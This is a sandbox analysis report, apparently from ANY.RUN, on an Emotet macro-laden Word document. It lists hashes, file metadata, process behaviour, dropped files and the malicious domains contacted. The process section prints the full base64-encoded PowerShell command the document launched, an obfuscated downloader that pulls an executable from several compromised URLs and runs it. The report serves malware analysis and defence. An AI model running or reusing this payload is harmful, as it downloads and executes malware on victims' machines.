analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

tài liệu_br__br__br__br_.mal

Full analysis: https://app.any.run/tasks/61221eca-e12f-4685-8917-da060b15e074
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 05:54:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Aut., Author: Mathis Philippe, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 24 21:42:00 2020, Last Saved Time/Date: Thu Sep 24 21:42:00 2020, Number of Pages: 1, Number of Words: 2393, Number of Characters: 13643, Security: 8
MD5:

ABD126F605FFD2123E296487D1CF663F

SHA1:

43D2600B3ABCE79609958D97B7262ED69572E576

SHA256:

5792D443111AA364AB531B3161490693129F6E0E7500C7E70B97C4042448B98F

SSDEEP:

3072:6UqJ1NgsA8k/gvh0NZ0lGX1nZ7jZo9nsYjM:6BtgVIveNZvnH1YjM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3496)
    • Executed via WMI

      • POwersheLL.exe (PID: 3496)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3496)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3140)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3140)
    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 3496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 16004
Paragraphs: 32
Lines: 113
Company: -
Security: Locked for annotations
Characters: 13643
Words: 2393
Pages: 1
ModifyDate: 2020:09:24 20:42:00
CreateDate: 2020:09:24 20:42:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Mathis Philippe
Subject: -
Title: Aut.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3140"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\tài liệu_br__br__br__br_.mal.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3496POwersheLL -ENCOD JABZAG4AbABnADkAMAByAD0AKAAoACcARQAnACsAJwAyADgAcwBoACcAKwAnAG4AJwApACsAJwBiACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAFIAbwBmAGkATABlAFwATwBFADUAeABfAFoAVQBcAHAAOAA3AEsAMgBfAFoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBgAGkAYABUAFkAcABSAE8AVABvAGMAYABvAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxACcAKwAnADIALAAgAHQAbABzACcAKQArACcAMQAxACcAKwAnACwAJwArACgAJwAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABBAGcAZQA2AGwAaABoACAAPQAgACgAKAAnAEYAdQAnACsAJwBrACcAKQArACcAagAwACcAKwAoACcAagAnACsAJwA0AF8AJwApACkAOwAkAEoAdQBzAHYAZgA0AGIAPQAoACcARAA4ACcAKwAoACcAOQAnACsAJwA4AGEAJwApACsAJwBtAHcAJwApADsAJABSAHkAZwBmAHAAcQBwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAB9AE8AJwArACgAJwBlACcAKwAnADUAeAAnACkAKwAoACcAXwB6ACcAKwAnAHUAJwApACsAJwB7ADAAfQBQACcAKwAoACcAOAA3ACcAKwAnAGsAJwApACsAJwAyAF8AJwArACcAegB7ADAAfQAnACkAIAAtAGYAIABbAGMASABhAHIAXQA5ADIAKQArACQAQQBnAGUANgBsAGgAaAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFYAcQBqADMAYwB3AGkAPQAoACgAJwBHACcAKwAnAGMAaAAnACkAKwAnAHoAcAAnACsAJwBiAHoAJwApADsAJABVADYAZgBfADYAZQBkAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAEMAbABJAEUATgB0ADsAJABMAHcAagA5AHoAbABpAD0AKAAoACcAaAB0AHQAcAAnACsAJwBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAcQAnACsAJwB1AGEAJwArACcAbAAnACsAKAAnAGkAJwArACcAdAB5AGMAJwArACcAaABpAGwAJwArACcAZABjAGEAJwApACsAKAAnAHIAZQBwACcAKwAnAHIAZQBzACcAKQArACcAYwAnACsAKAAnAGgAbwAnACsAJwBvAGwALgAnACsAJwBjAG8AJwApACsAKAAnAG0ALwBlAG0AcQBiACcAKwAnAGwAJwArACcAawAnACkAKwAoACcALwAnACsAJwBXAG4AVwAnACkAKwAnAHMAJwArACgAJwBlACcAKwAnAGcAcAAnACkAKwAoACcATgAnACsAJwBRAC8AJwApACsAJwAqACcAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHcAJwApACsAJwB3AHcAJwArACgAJwAuAHMAJwArACcAYQAnACsAJwBuAGEAbQBiAGEAawAnACsAJwBzACcAKQArACgAJwBoACcAKwAnAGkALgBjAG8AbQAvAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAbQBpACcAKwAnAG4AJwApACsAJwAvACcAKwAnADUAJwArACgAJwBlAHYAJwArACcAZAAnACkAKwAoACcAbQAnACsAJwBPAGcAJwArACcAeQAvACoAaAAnACkAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AZQAnACsAJwBuAGUAdwBzAC4AZQBuACcAKwAnAGsAagAuAGMAbwAnACsAJwBtAC8AJwArACcAdwBvAHIAJwArACcAZAAnACsAJwBwAHIAJwApACsAKAAnAGUAcwAnACsAJwBzACcAKQArACcALwBxACcAKwAnADkAJwArACgAJwA4ACcAKwAnAGYATAAnACkAKwAoACcAcwAnACsAJwAzAHYAJwApACsAJwAvACoAJwArACgAJwBoAHQAdABwADoAJwArACcALwAvADEAOAA4AC4AMQAnACsAJwA2ADYAJwArACcALgAyADAANwAuADEAJwApACsAKAAnADgAMgAvACcAKwAnAHMANgB5ADAAJwArACcANAAvAG0AJwApACsAKAAnAGcAZAAvACoAaAB0AHQAcABzADoALwAnACsAJwAvAGQAYQAnACsAJwBnACcAKwAnAHIAJwArACcAYQBuAGkAdABlAGcAaQBhACcAKQArACgAJwByAGUALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAcAAtAGEAJwArACcAZAAnACkAKwAoACcAbQBpACcAKwAnAG4AJwApACsAJwAvAE4AJwArACgAJwBGAHEAcQBwACcAKwAnAC8AJwApACsAJwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAvAC8AJwArACcAYgAnACsAJwBhAHAAcABlACcAKwAnAGQAYQAnACsAJwAuAGIAYQAnACkAKwAnAHIAJwArACgAJwByAHUAawAnACsAJwBhAGIAJwApACsAKAAnAC4AZwBvAC4AaQBkAC8AdwAnACsAJwBwAC0AYwBvAG4AJwArACcAdAAnACsAJwBlACcAKwAnAG4AJwApACsAJwB0ACcAKwAoACcALwBCAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAcABzADoALwAnACsAJwAvAGEAbQBiAHUAJwArACcAbABhACcAKwAnAG4AJwArACcAYwBlAHMAZQByAHYAJwApACsAKAAnAGkAJwArACcAYwBlAC4AbgBsAC8AZQAnACsAJwB4AHAAbwByACcAKwAnAHQALwBGAEkATAAnACkAKwAoACcARQAvAG4AegAnACsAJwBZAG4AJwArACcALwAnACkAKQAuACIAUwBgAFAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAGQAdgBvAF8AcABhAD0AKAAoACcAVwBhAGMAJwArACcAcgAnACkAKwAnAGQAJwArACcAegBoACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAcAA1ADYAbwAzADgAIABpAG4AIAAkAEwAdwBqADkAegBsAGkAKQB7AHQAcgB5AHsAJABVADYAZgBfADYAZQBkAC4AIgBkAG8AVwBuAGAAbABgAE8AYQBkAEYAYABJAEwARQAiACgAJABWAHAANQA2AG8AMwA4ACwAIAAkAFIAeQBnAGYAcABxAHAAKQA7ACQAUgB4AGUANQB1AGgAYgA9ACgAJwBJACcAKwAoACcAeABsAGQAJwArACcAdwBtACcAKQArACcAYwAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUgB5AGcAZgBwAHEAcAApAC4AIgBsAEUAYABOAGAAZwBUAEgAIgAgAC0AZwBlACAAMgAxADQAOQA2ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFIAeQBnAGYAcABxAHAAKQA7ACQASgB3ADkAMwBoAHkAcAA9ACgAKAAnAEgAJwArACcAOABiAHQAJwApACsAKAAnADMAMwAnACsAJwB1ACcAKQApADsAYgByAGUAYQBrADsAJABaAGEAMwA5ADcAYQBkAD0AKAAoACcAVQAnACsAJwBjAG0AJwApACsAJwBlADkAJwArACcAbQB0ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQBqADEAZABrAHEAcgA9ACgAJwBTAG8AJwArACgAJwBqAGwAXwAnACsAJwBqACcAKQArACcAdQAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 017
Read events
1 129
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7252.tmp.cvr
MD5:
SHA256:
3496POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W42X6X7PT5E9SEUR243B.temp
MD5:
SHA256:
3140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:ACDE23E2430B636E10A7447ECE5D611C
SHA256:87D43D07A7CE38A6F6AE5F5177E167A0DFEC21BEBE613C8987EDDE87A93D2B5F
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:0522E3D6FCD154874A57422398961E3C
SHA256:8269F15820957EE25AE2326EBDDE9F4886319CDC37492F05B1A05D7E39AF1775
3496POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
3496POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3b80d9.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$̀i liệu_br__br__br__br_.mal.docpgc
MD5:2F971C77B01DFAA1EA9333FE2590135C
SHA256:50440CD0BFAEBCD8D9A122BB90537A1E2A3BCF46AFE7F72E2B428997CD828C7B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3496
POwersheLL.exe
209.205.123.182:443
www.sanambakshi.com
Servers.com, Inc.
US
malicious
3496
POwersheLL.exe
162.241.154.46:443
qualitychildcarepreschool.com
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
qualitychildcarepreschool.com
  • 162.241.154.46
suspicious
www.sanambakshi.com
  • 209.205.123.182
suspicious

Threats

No threats detected
No debug info